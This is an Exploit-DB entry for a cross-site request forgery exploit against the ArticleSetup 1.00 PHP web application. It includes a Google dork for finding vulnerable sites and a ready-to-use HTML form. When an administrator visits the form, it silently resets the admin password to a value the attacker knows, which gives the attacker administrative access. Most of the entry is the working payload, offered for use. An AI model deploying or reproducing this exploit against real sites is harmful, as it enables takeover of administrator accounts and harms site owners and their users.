ArticleSetup 1.00 - CSRF Change Admin Password

2016-06-06T00:00:00
ID EDB-ID:39889
Type exploitdb
Reporter Ali Ghanbari
Modified 2016-06-06T00:00:00

Description

ArticleSetup 1.00 - CSRF Change Admin Password. Webapps exploit for php platform

                                        
                                            <!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post"  action="
http://localhost/{PACH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" type="hidden" value="12345678" >
      <input type="hidden" name="pass2" type="hidden" value="12345678" >
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->